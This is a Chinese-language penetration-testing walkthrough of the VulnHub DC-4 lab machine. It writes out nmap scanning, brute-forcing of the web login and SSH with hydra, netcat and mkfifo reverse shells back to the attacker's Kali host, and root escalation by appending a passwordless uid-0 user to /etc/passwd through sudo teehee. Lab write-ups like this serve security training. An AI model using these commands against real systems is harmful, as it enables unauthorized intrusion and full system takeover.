---

一、环境搭建

DC-4下载地址：https://download.vulnhub.com/dc/DC-4.zip
kali：192.168.144.148
DC-4：192.168.144.152

---

二、渗透流程

端口扫描：nmap -T5 -p- -sV -sT -A 192.168.144.152

思路：
1、访问80页面，爆破账号密码（可利用）
2、对http://192.168.144.152进行目录爆破
3、查看网页源代码
4、查看web指纹信息
……

使用burpsuite对登录页面进行爆破：admin：happy

思路：登录后有run command按钮，抓包发现可以执行命令
1、请求包中执行反弹shell命令（可利用）
2、使用wget，让靶机下载webshell，然后连接webshell
……

方法1：

使用netcat反弹shell：nc -e /bin/sh 192.168.144.148 4444
kali监听：nc -lvnp 4444

python -c 'import pty;pty.spawn("/bin/sh")'

方法2：

kali端监听： nc -lnvp 4444
修改网页源代码为反弹shell代码：rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.144.148 4444 > /tmp/f;，然后点击run

---

kali端获取到反弹shell

思路（此时已经拿到shell）：
1、查看当前权限
2、翻翻找找，看看有没有可利用的
……

python -c 'import pty;pty.spawn("/bin/bash")'

cat /etc/passwd 发现三个用户：charles、jim、sam

cd /home 发现三个用户目录
/jim路径下发现old-passwords.bak文件进行利用

利用old-passwords.bak保存的密码对jim的密码进行爆破；
爆破密码：hydra -l jim -P passwd.txt -s 22 ssh://192.168.144.152
成功获取密码：jim：jibril04
ssh登录：ssh jim@192.168.144.152 -p 22

cd /var/mail 下发现charles的密码：^xHhA&hvim0y

jim下没其他可以利用的了，我们尝试登录charles用户
ssh charles@192.168.144.152 -p 22

查看是否有sudo权限：sudo -l
发现teehee执行权限

teehee --help
发现-a参数可以写入文件

用户名：密码：用户ID：组ID：用户说明：家目录：登陆之后的 shell
echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su test

---

三、思路总结

1、爆破登录账号密码
2、根据页面功能反弹shell
3、查看获取到的shell的可利用文件
4、ssh连接  
5、利用teehee执行权限添加特权用户，获取root权限

---

参考链接：
https://blog.mzfr.me/vulnhub-writeups/2019-07-11-DC4